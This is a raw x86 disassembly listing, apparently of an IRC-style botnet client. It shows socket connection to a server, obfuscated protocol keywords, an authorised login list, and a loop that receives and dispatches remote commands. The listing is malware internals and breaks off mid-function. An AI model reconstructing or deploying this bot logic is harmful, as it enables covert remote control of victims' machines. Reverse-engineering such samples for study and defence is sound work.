lea eax, dword_4584B0[esi]
push 0
push eax
call sub_429690
xor eax, eax
add esp, 24h
inc eax
jmp short loc_41C68B
; ---------------------------------------------------------------------------
loc_41C689: ; CODE XREF: sub_41C63E+14�j
xor eax, eax
loc_41C68B: ; CODE XREF: sub_41C63E+49�j
pop esi
retn 4
sub_41C63E endp
; =============== S U B R O U T I N E =======================================
sub_41C68F proc near ; CODE XREF: sub_41CAFB+AE�p
; sub_420399+C7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, dword_437174
push edi
mov edi, offset dword_458490
loc_41C69C: ; CODE XREF: sub_41C68F+45�j
cmp byte ptr [edi], 0
jz short loc_41C6C8
push [esp+8+arg_0]
push edi
call esi ; dword_437174
test eax, eax
jnz short loc_41C6C8
push [esp+8+arg_4]
lea eax, [edi+10h]
push eax
call esi ; dword_437174
test eax, eax
jnz short loc_41C6C8
push [esp+8+arg_8]
lea eax, [edi+20h]
push eax
call esi ; dword_437174
test eax, eax
jz short loc_41C6DD
loc_41C6C8: ; CODE XREF: sub_41C68F+10�j
; sub_41C68F+1B�j ...
add edi, 0BFh
cmp edi, offset byte_4586CD
jl short loc_41C69C
xor eax, eax
loc_41C6D8: ; CODE XREF: sub_41C68F+51�j
pop edi
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_41C6DD: ; CODE XREF: sub_41C68F+37�j
xor eax, eax
inc eax
jmp short loc_41C6D8
sub_41C68F endp
; =============== S U B R O U T I N E =======================================
sub_41C6E2 proc near ; CODE XREF: sub_420399+134�p
; sub_420399+1F3�p ...
mov eax, offset dword_458490
loc_41C6E7: ; CODE XREF: sub_41C6E2+14�j
cmp byte ptr [eax], 0
jnz short loc_41C6FB
add eax, 0BFh
cmp eax, offset byte_4586CD
jl short loc_41C6E7
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C6FB: ; CODE XREF: sub_41C6E2+8�j
xor eax, eax
inc eax
retn
sub_41C6E2 endp
; =============== S U B R O U T I N E =======================================
sub_41C6FF proc near ; CODE XREF: sub_40A938+A18�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov edi, ecx
push offset aSLoginList ; "%s Login List:"
push ebp
push edi
call sub_41CD84
add esp, 10h
xor ebx, ebx
mov esi, offset dword_458490
loc_41C724: ; CODE XREF: sub_41C6FF+62�j
cmp byte ptr [esi], 0
jz short loc_41C744
lea eax, [esi+10h]
lea ecx, [eax+10h]
push ecx
push eax
push esi
push ebx
push offset aISS@S ; "<%i> %s!%s@%s"
push ebp
push edi
call sub_41CD84
add esp, 1Ch
jmp short loc_41C754
; ---------------------------------------------------------------------------
loc_41C744: ; CODE XREF: sub_41C6FF+28�j
push ebx
push offset aIEmpty ; "<%i> <Empty>"
push ebp
push edi
call sub_41CD84
add esp, 10h
loc_41C754: ; CODE XREF: sub_41C6FF+43�j
add esi, 0BFh
inc ebx
cmp esi, offset byte_4586CD
jl short loc_41C724
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSLoginListComp ; "%s Login List complete."
push ebp
push edi
call sub_41CD84
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_41C6FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C77E proc near ; CODE XREF: sub_420399+15C�p
; sub_420399+510�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429A90
push ebx
mov ebx, [ebp+arg_0]
cmp byte ptr [ebx+4], 0
jnz short loc_41C79A
xor eax, eax
inc eax
jmp short loc_41C7E8
; ---------------------------------------------------------------------------
loc_41C79A: ; CODE XREF: sub_41C77E+15�j
push esi
lea eax, [ebp+arg_8]
push edi
push eax
push [ebp+arg_4]
lea eax, [ebp+var_2710]
xor edi, edi
push 2710h
push eax
call sub_42B7DA
add esp, 10h
mov esi, offset dword_458490
loc_41C7BE: ; CODE XREF: sub_41C77E+64�j
cmp byte ptr [esi], 0
jz short loc_41C7D6
lea eax, [ebp+var_2710]
push eax
push esi
push ebx
call sub_41CD0E
add esp, 0Ch
add edi, eax
loc_41C7D6: ; CODE XREF: sub_41C77E+43�j
add esi, 0BFh
cmp esi, offset byte_4586CD
jl short loc_41C7BE
mov eax, edi
pop edi
pop esi
loc_41C7E8: ; CODE XREF: sub_41C77E+1A�j
pop ebx
leave
retn
sub_41C77E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7EB proc near ; CODE XREF: sub_418EDB+616�p
var_3C = qword ptr -3Ch
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_1C = qword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push esi
mov esi, ecx
push edi
cmp byte ptr [esi+4], 0
jz short loc_41C803
xor eax, eax
inc eax
jmp loc_41C9B6
; ---------------------------------------------------------------------------
loc_41C803: ; CODE XREF: sub_41C7EB+E�j
cmp dword_457030, 0
jnz short loc_41C829
loc_41C80C: ; CODE XREF: sub_41C7EB+3C�j
lea eax, [ebp+var_4]
push 0
push eax
call dword_456E18 ; InternetGetConnectedState
test eax, eax
jnz short loc_41C829
push 4E20h
call dword_43718C ; Sleep
jmp short loc_41C80C
; ---------------------------------------------------------------------------
loc_41C829: ; CODE XREF: sub_41C7EB+1F�j
; sub_41C7EB+2F�j
xor edi, edi
push 6
inc edi
push edi
push 2
call dword_456FB0 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_41C88C
push [ebp+arg_0]
call dword_456FB4 ; gethostbyname
test eax, eax
jz short loc_41C884
mov eax, [eax+0Ch]
push 4
push dword ptr [eax]
lea eax, [ebp+var_28]
push eax
call sub_429350
add esp, 0Ch
mov [ebp+var_2C], 2
push [ebp+arg_4]
call dword_456F18 ; ntohs
mov [ebp+var_2A], ax
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41C893
loc_41C884: ; CODE XREF: sub_41C7EB+5E�j
push dword ptr [esi]
call dword_456FD0 ; closesocket
loc_41C88C: ; CODE XREF: sub_41C7EB+51�j
mov eax, edi
jmp loc_41C9B6
; ---------------------------------------------------------------------------
loc_41C893: ; CODE XREF: sub_41C7EB+97�j
push ebx
mov ebx, dword_437184
call ebx ; dword_437184
mov ecx, esi
mov dword_45848C, eax
call sub_41C5FE
lea eax, [ebp+var_14]
push eax
call dword_4370C0 ; QueryPerformanceCounter
lea eax, [ebp+var_C]
push eax
call dword_4370BC ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_10], eax
jl short loc_41C903
jg short loc_41C8CA
cmp [ebp+var_14], eax
jbe short loc_41C903
loc_41C8CA: ; CODE XREF: sub_41C7EB+D8�j
cmp [ebp+var_8], eax
jl short loc_41C903
jg short loc_41C8D6
cmp [ebp+var_C], eax
jbe short loc_41C903
loc_41C8D6: ; CODE XREF: sub_41C7EB+E4�j
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
call sub_42B220
mov dword ptr [ebp+var_1C], eax
mov dword ptr [ebp+var_1C+4], edx
fild [ebp+var_1C]
push ecx
push ecx ; double
fstp [esp+3Ch+var_3C]
call sub_42A636
pop ecx
pop ecx
call sub_42A910
jmp short loc_41C905
; ---------------------------------------------------------------------------
loc_41C903: ; CODE XREF: sub_41C7EB+D6�j
; sub_41C7EB+DD�j ...
call ebx ; dword_437184
loc_41C905: ; CODE XREF: sub_41C7EB+116�j
mov dword_457F40, eax
call ebx ; dword_437184
push [ebp+arg_8]
mov dword_45848C, eax
mov byte ptr [esi+4], 1
call sub_4292D0
inc eax
push eax
call sub_42B407
mov edi, dword_4370A4
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+arg_8]
push eax
call edi ; dword_4370A4
push [ebp+arg_C]
call sub_4292D0
inc eax
push eax
call sub_42B407
pop ecx
mov [esi+0Ch], eax
pop ecx
push [ebp+arg_10]
push eax
call edi ; dword_4370A4
cmp [ebp+arg_14], 0
mov edi, offset aSS ; "%s %s\r\n"
jz short loc_41C980
push offset byte_454A34
push [ebp+arg_14]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41C980
push [ebp+arg_14]
push offset a7lybp1gunfm0 ; "7LybP1GuNfm0"
push edi
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 14h
loc_41C980: ; CODE XREF: sub_41C7EB+16D�j
; sub_41C7EB+17F�j
push [ebp+arg_8]
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push edi
push dword ptr [esi]
push esi
call sub_41C41E
push [ebp+arg_10]
push [ebp+arg_C]
push offset a391myLxl28_ ; "391mY/LxL28."
push offset aSS0S ; "%s %s * 0 :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 2Ch
call ebx ; dword_437184
mov dword_45848C, eax
xor eax, eax
pop ebx
loc_41C9B6: ; CODE XREF: sub_41C7EB+13�j
; sub_41C7EB+A3�j
pop edi
pop esi
leave
retn 18h
sub_41C7EB endp
; =============== S U B R O U T I N E =======================================
sub_41C9BC proc near ; CODE XREF: sub_40A938+B4A�p
; sub_4181F4+67B�p ...
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_41C9EC
push offset a___ ; "..."
push esi
call sub_41C9EE
pop ecx
and byte ptr [esi+4], 0
and byte ptr [esi+5], 0
pop ecx
push 2
push dword ptr [esi]
call dword_456FC8 ; shutdown
push dword ptr [esi]
call dword_456FD0 ; closesocket
loc_41C9EC: ; CODE XREF: sub_41C9BC+7�j
pop esi
retn
sub_41C9BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9EE proc near ; CODE XREF: sub_40A938+B38�p
; sub_4181F4+66A�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429A90
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_41CA5F
cmp [ebp+arg_4], 0
jz short loc_41CA41
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_2710]
push [ebp+arg_4]
push 2710h
push eax
call sub_42B7DA
lea eax, [ebp+var_2710]
push eax
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push offset aSS ; "%s %s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 24h
jmp short loc_41CA56
; ---------------------------------------------------------------------------
loc_41CA41: ; CODE XREF: sub_41C9EE+1B�j
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push offset aS_6 ; "%s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 10h
loc_41CA56: ; CODE XREF: sub_41C9EE+51�j
test eax, eax
jz short loc_41CA5F
xor eax, eax
inc eax
jmp short loc_41CA61
; ---------------------------------------------------------------------------
loc_41CA5F: ; CODE XREF: sub_41C9EE+15�j
; sub_41C9EE+6A�j
xor eax, eax
loc_41CA61: ; CODE XREF: sub_41C9EE+6F�j
pop esi
leave
retn
sub_41C9EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA64 proc near ; CODE XREF: sub_418EDB+61D�p
var_400 = byte ptr -400h
push ebp
mov ebp, esp
sub esp, 400h
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_41CAC0
push edi
loc_41CA77: ; CODE XREF: sub_41CA64+55�j
push 0
lea eax, [ebp+var_400]
push 3FFh
push eax
push dword ptr [esi]
call dword_456F38 ; recv
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41CABB
test edi, edi
jz short loc_41CABB
call dword_437184 ; GetTickCount
and [ebp+edi+var_400], 0
mov dword_45848C, eax
lea eax, [ebp+var_400]
mov ecx, esi
push eax
call sub_41CAC6
jmp short loc_41CA77
; ---------------------------------------------------------------------------
loc_41CABB: ; CODE XREF: sub_41CA64+2E�j
; sub_41CA64+32�j
and byte ptr [esi+4], 0
pop edi
loc_41CAC0: ; CODE XREF: sub_41CA64+10�j
xor eax, eax
pop esi
inc eax
leave
retn
sub_41CA64 endp
; =============== S U B R O U T I N E =======================================
sub_41CAC6 proc near ; CODE XREF: sub_41CA64+50�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
mov ebp, ecx
mov ebx, offset asc_4476B0 ; "\r\n"
jmp short loc_41CAE5
; ---------------------------------------------------------------------------
loc_41CAD7: ; CODE XREF: sub_41CAC6+2C�j
and byte ptr [esi], 0
push edi
mov ecx, ebp
call sub_41CAFB
lea edi, [esi+2]
loc_41CAE5: ; CODE XREF: sub_41CAC6+F�j
push ebx
push edi
call sub_42ADD0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_41CAD7
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_41CAC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAFB proc near ; CODE XREF: sub_41CAC6+17�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
cmp byte ptr [eax], 3Ah
push edi
mov [ebp+var_4], ecx
mov [ebp+var_8], ebx
push 20h
jnz loc_41CC74
lea esi, [eax+1]
push esi
call sub_42B0D0
pop ecx
cmp eax, ebx
pop ecx
jz loc_41CCD1
mov [eax], bl
inc eax
push 20h
push eax
mov [ebp+arg_0], eax
call sub_42B0D0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_41CB46
mov [edi], bl
inc edi
loc_41CB46: ; CODE XREF: sub_41CAFB+46�j
push 21h
push esi
mov [ebp+var_14], esi
call sub_42B0D0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_10], eax
jz short loc_41CB77
mov [eax], bl
inc [ebp+var_10]
push 40h
push [ebp+var_10]
call sub_42B0D0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
jz short loc_41CB77
mov [eax], bl
inc [ebp+var_C]
loc_41CB77: ; CODE XREF: sub_41CAFB+5D�j
; sub_41CAFB+75�j
mov esi, dword_437174
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jz loc_41CC6A
push offset aYjmlc1btsf10_0 ; "yJmlc1btsF10"
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jnz short loc_41CBCC
loc_41CB9D: ; CODE XREF: sub_41CAFB+DD�j
push [ebp+var_C]
mov ecx, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_14]
call sub_41C68F
test eax, eax
jz loc_41CC6A
push [ebp+var_C]
mov ecx, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_14]
call sub_41C598
jmp loc_41CC6A
; ---------------------------------------------------------------------------
loc_41CBCC: ; CODE XREF: sub_41CAFB+A0�j
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jz short loc_41CB9D
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jnz short loc_41CC00
push 20h
push edi
mov [ebp+var_8], edi
call sub_42B0D0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_41CBFD
loc_41CBFB: ; CODE XREF: sub_41CAFB+12A�j
mov [edi], bl
loc_41CBFD: ; CODE XREF: sub_41CAFB+FE�j
inc edi
jmp short loc_41CC6A
; ---------------------------------------------------------------------------
loc_41CC00: ; CODE XREF: sub_41CAFB+EB�j
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jnz short loc_41CC27
push 20h
push edi
mov [ebp+var_8], edi
call sub_42B0D0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_41CCD1
jmp short loc_41CBFB
; ---------------------------------------------------------------------------
loc_41CC27: ; CODE XREF: sub_41CAFB+111�j
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jnz short loc_41CC6A
mov eax, [ebp+var_4]
push dword ptr [eax+8]
push [ebp+var_14]
call esi ; dword_437174
test eax, eax
jnz short loc_41CC6A
mov esi, [ebp+var_4]
push dword ptr [esi+8]
call sub_429006
push edi
call sub_4292D0
inc eax
push eax
call sub_42B407
add esp, 0Ch
mov [esi+8], eax
push edi
push eax
call dword_4370A4 ; lstrcpyA
loc_41CC6A: ; CODE XREF: sub_41CAFB+8E�j
; sub_41CAFB+B5�j ...
lea eax, [ebp+var_14]
push eax
push edi
push [ebp+arg_0]
jmp short loc_41CCC9
; ---------------------------------------------------------------------------
loc_41CC74: ; CODE XREF: sub_41CAFB+19�j
push eax
mov edi, eax
call sub_42B0D0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41CCD1
push offset dword_445B30
push edi
mov [eax], bl
lea esi, [eax+1]
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_41CCB7
cmp esi, ebx
jz short loc_41CCD1
mov eax, [ebp+var_4]
inc esi
push esi
push offset dword_445B40
push offset aSS ; "%s %s\r\n"
push dword ptr [eax]
push eax
call sub_41C41E
add esp, 14h
jmp short loc_41CCD1
; ---------------------------------------------------------------------------
loc_41CCB7: ; CODE XREF: sub_41CAFB+19A�j
lea eax, [ebp+var_14]
mov [ebp+var_C], ebx
push eax
push esi
mov [ebp+var_10], ebx
mov [ebp+var_14], ebx
mov [ebp+var_8], ebx
push edi
loc_41CCC9: ; CODE XREF: sub_41CAFB+177�j
mov ecx, [ebp+var_4]
call sub_41CCD8
loc_41CCD1: ; CODE XREF: sub_41CAFB+2C�j
; sub_41CAFB+124�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_41CAFB endp
; =============== S U B R O U T I N E =======================================
sub_41CCD8 proc near ; CODE XREF: sub_41CAFB+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, ecx
mov esi, [edi+20h]
jmp short loc_41CCF4
; ---------------------------------------------------------------------------
loc_41CCE1: ; CODE XREF: sub_41CCD8+1E�j
push [esp+8+arg_0]
push dword ptr [esi]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41CCFA
mov esi, [esi+8]
loc_41CCF4: ; CODE XREF: sub_41CCD8+7�j
test esi, esi
jnz short loc_41CCE1
jmp short loc_41CD09
; ---------------------------------------------------------------------------
loc_41CCFA: ; CODE XREF: sub_41CCD8+17�j
push edi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
call dword ptr [esi+4]
add esp, 0Ch
loc_41CD09: ; CODE XREF: sub_41CCD8+20�j
pop edi
pop esi
retn 0Ch
sub_41CCD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD0E proc near ; CODE XREF: .text:00401976�p
; sub_401990:loc_401A6D�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429A90
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41CD2A
xor eax, eax
inc eax
jmp short loc_41CD81
; ---------------------------------------------------------------------------
loc_41CD2A: ; CODE XREF: sub_41CD0E+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_2710]
push [ebp+arg_8]
push 2710h
push eax
call sub_42B7DA
lea eax, [ebp+var_2710]
push eax
push offset dword_443E90
call sub_41553D
lea eax, [ebp+var_2710]
push eax
push [ebp+arg_4]
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 30h
mov esi, eax
push 3E8h
call dword_43718C ; Sleep
mov eax, esi
loc_41CD81: ; CODE XREF: sub_41CD0E+1A�j
pop esi
leave
retn
sub_41CD0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD84 proc near ; CODE XREF: .text:00401944�p
; sub_401990:loc_401A66�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429A90
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41CDA0
xor eax, eax
inc eax
jmp short loc_41CDF7
; ---------------------------------------------------------------------------
loc_41CDA0: ; CODE XREF: sub_41CD84+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_8]
push 26F6h
push eax
call sub_42B7DA
lea eax, [ebp+var_26F8]
push eax
push offset dword_443E90
call sub_41553D
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 30h
mov esi, eax
push 3E8h
call dword_43718C ; Sleep
mov eax, esi
loc_41CDF7: ; CODE XREF: sub_41CD84+1A�j
pop esi
leave
retn
sub_41CD84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CDFA proc near ; CODE XREF: sub_40A938+5411�p
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429A90
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41CE16
xor eax, eax
inc eax
jmp short loc_41CE5C
; ---------------------------------------------------------------------------
loc_41CE16: ; CODE XREF: sub_41CDFA+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_8]
push 26F6h
push eax
call sub_42B7DA
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push offset dword_4476C0
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 28h
mov esi, eax
push 3E8h
call dword_43718C ; Sleep
mov eax, esi
loc_41CE5C: ; CODE XREF: sub_41CDFA+1A�j
pop esi
leave
retn
sub_41CDFA endp
; =============== S U B R O U T I N E =======================================
sub_41CE5F proc near ; CODE XREF: sub_40A938+2323�p
; sub_40A938+29DD�p ...
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41CE6A
xor eax, eax
inc eax
jmp short locret_41CE83
; ---------------------------------------------------------------------------
loc_41CE6A: ; CODE XREF: sub_41CE5F+4�j
push [esp+arg_0]
push offset aKc4l5_savs3_ ; "KC4L5.sAVS3."
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 14h
locret_41CE83: ; CODE XREF: sub_41CE5F+9�j
retn 4
sub_41CE5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE86 proc near ; CODE XREF: sub_423BB1+471�p
; sub_423BB1+5D4�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429A90
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_41CED3
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_C]
push 26F6h
push eax
call sub_42B7DA
add esp, 10h
cmp [ebp+arg_8], 0
jz short loc_41CED8
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_8]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jnz short loc_41CED8
loc_41CED3: ; CODE XREF: sub_41CE86+15�j
xor eax, eax
inc eax
jmp short loc_41CF17
; ---------------------------------------------------------------------------
loc_41CED8: ; CODE XREF: sub_41CE86+36�j
; sub_41CE86+4B�j
lea eax, [ebp+var_26F8]
push eax
push offset dword_443E90
call sub_41553D
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 20h
mov esi, eax
push 3E8h
call dword_43718C ; Sleep
mov eax, esi
loc_41CF17: ; CODE XREF: sub_41CE86+50�j
pop esi
leave
retn
sub_41CE86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF1A proc near ; CODE XREF: sub_423BB1:loc_424029�p
; sub_423BB1:loc_42418C�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429A90
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_41CF67
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_C]
push 26F6h
push eax
call sub_42B7DA
add esp, 10h
cmp [ebp+arg_8], 0
jz short loc_41CF6C
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_8]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jnz short loc_41CF6C
loc_41CF67: ; CODE XREF: sub_41CF1A+15�j
xor eax, eax
inc eax
jmp short loc_41CFAB
; ---------------------------------------------------------------------------
loc_41CF6C: ; CODE XREF: sub_41CF1A+36�j
; sub_41CF1A+4B�j
lea eax, [ebp+var_26F8]
push eax
push offset dword_443E90
call sub_41553D
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C41E
add esp, 20h
mov esi, eax
push 3E8h
call dword_43718C ; Sleep
mov eax, esi
loc_41CFAB: ; CODE XREF: sub_41CF1A+50�j
pop esi
leave
retn
sub_41CF1A endp
; =============== S U B R O U T I N E =======================================
sub_41CFAE proc near ; CODE XREF: sub_4209F2+62�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41CFB9
xor eax, eax
inc eax
jmp short locret_41CFD2
; ---------------------------------------------------------------------------
loc_41CFB9: ; CODE XREF: sub_41CFAE+4�j
push [esp+arg_0]
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 14h
locret_41CFD2: ; CODE XREF: sub_41CFAE+9�j
retn 4
sub_41CFAE endp
; =============== S U B R O U T I N E =======================================
sub_41CFD5 proc near ; CODE XREF: sub_40A938+2352�p
; sub_4209F2+58�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp byte ptr [ecx+4], 0
jnz short loc_41CFE0
xor eax, eax
inc eax
jmp short locret_41CFFD
; ---------------------------------------------------------------------------
loc_41CFE0: ; CODE XREF: sub_41CFD5+4�j
push [esp+arg_4]
push [esp+4+arg_0]
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push offset dword_4476D8
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 18h
locret_41CFFD: ; CODE XREF: sub_41CFD5+9�j
retn 8
sub_41CFD5 endp
; =============== S U B R O U T I N E =======================================
sub_41D000 proc near ; CODE XREF: sub_40A938+2374�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41D00B
xor eax, eax
inc eax
jmp short locret_41D024
; ---------------------------------------------------------------------------
loc_41D00B: ; CODE XREF: sub_41D000+4�j
push [esp+arg_0]
push offset aYjmlc1btsf10_0 ; "yJmlc1btsF10"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 14h
locret_41D024: ; CODE XREF: sub_41D000+9�j
retn 4
sub_41D000 endp
; =============== S U B R O U T I N E =======================================
sub_41D027 proc near ; CODE XREF: sub_40A938+2401�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp byte ptr [eax+4], 0
jnz short loc_41D035
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D035: ; CODE XREF: sub_41D027+8�j
push [esp+arg_4]
push offset aS_6 ; "%s\r\n"
push dword ptr [eax]
push eax
call sub_41C41E
add esp, 10h
retn
sub_41D027 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D04A proc near ; CODE XREF: sub_41D09D+14�p
; sub_420C63+41�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
